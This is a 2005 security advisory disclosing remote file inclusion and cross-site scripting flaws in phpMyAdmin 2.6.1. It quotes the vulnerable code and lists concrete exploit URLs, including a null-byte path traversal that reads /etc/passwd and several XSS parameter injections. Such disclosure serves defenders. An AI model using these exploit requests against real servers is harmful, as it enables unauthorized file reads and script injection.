-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpMyAdmin 2.6.1 Remote file inclusion and XSS cXIb8O3.4] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 24.2.2005 - --- 0.Description --- phpMyAdmin 2.6.1 is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields. - --- 1. Remote file inclusion --- 1.0 This bug exist in css/phpmyadmin.css.php. You can include files. Error exist in Code: - ------ $tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' . $theme . '/css/theme_right.css.php'; if (@file_exists($tmp_file)) { include($tmp_file); } // end of include theme_right.css.php - ------ And now you can get files. For exemple: http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00 http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00 etc. 1.1 Or next include is in libraries/database_interface.lib.php Code: - --- 18# require_once('./libraries/dbi/' . $cfg['Server']['extension'] . '.dbi.lib.php'); - --- For exemple: http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3 Error message : - --------------- Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php) [function.main]: failed to open stream: No such file or directory in /www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php on line 18 Fatal error: main() [function.require]: Failed opening required './libraries/dbi/cXIb8O3.dbi.lib.php' (include_path='.:') in /www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php on line 18 - --------------- Or if you want and if you see php error and register_globals=on, can you make xss with php buq. For Exemple: http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E - --- 2. XSS aka Cross Site Scripting --- If register_globals=On: 2.0 http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code] http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code] http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS 2.1 http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code] http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code] 2.2 http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS] and more in this file. 2.3 http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS] and more in this file. - --- 3. How to fix --- CVS or https://sourceforge.net/tracker/download.php?group_id=23067&atid=377408&file_id=122735&aid=1149381 >> libraries/grab_globals.lib.php or wait for new version.. - --- 4. Greets --- sp3x. i need help.. :( - --- 5.Contact --- Author: Maksymilian Arciemowicz Location: Poland(Jelenia Gora), Luxembourg(Bereldange) Email: max [at] jestsuper [dot] pl GPG-KEY: http://security.jestsuper.pl http://securityreason.com/ Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.6 (FreeBSD) iD8DBQFCHR89znmvyJCR4zQRAtj3AJ4wxM3WEn56GNohsG3f4U8Ku+/I8wCeMWQr YklTAm82iDqNu3so1uYsmEk= =ko9x -----END PGP SIGNATURE-----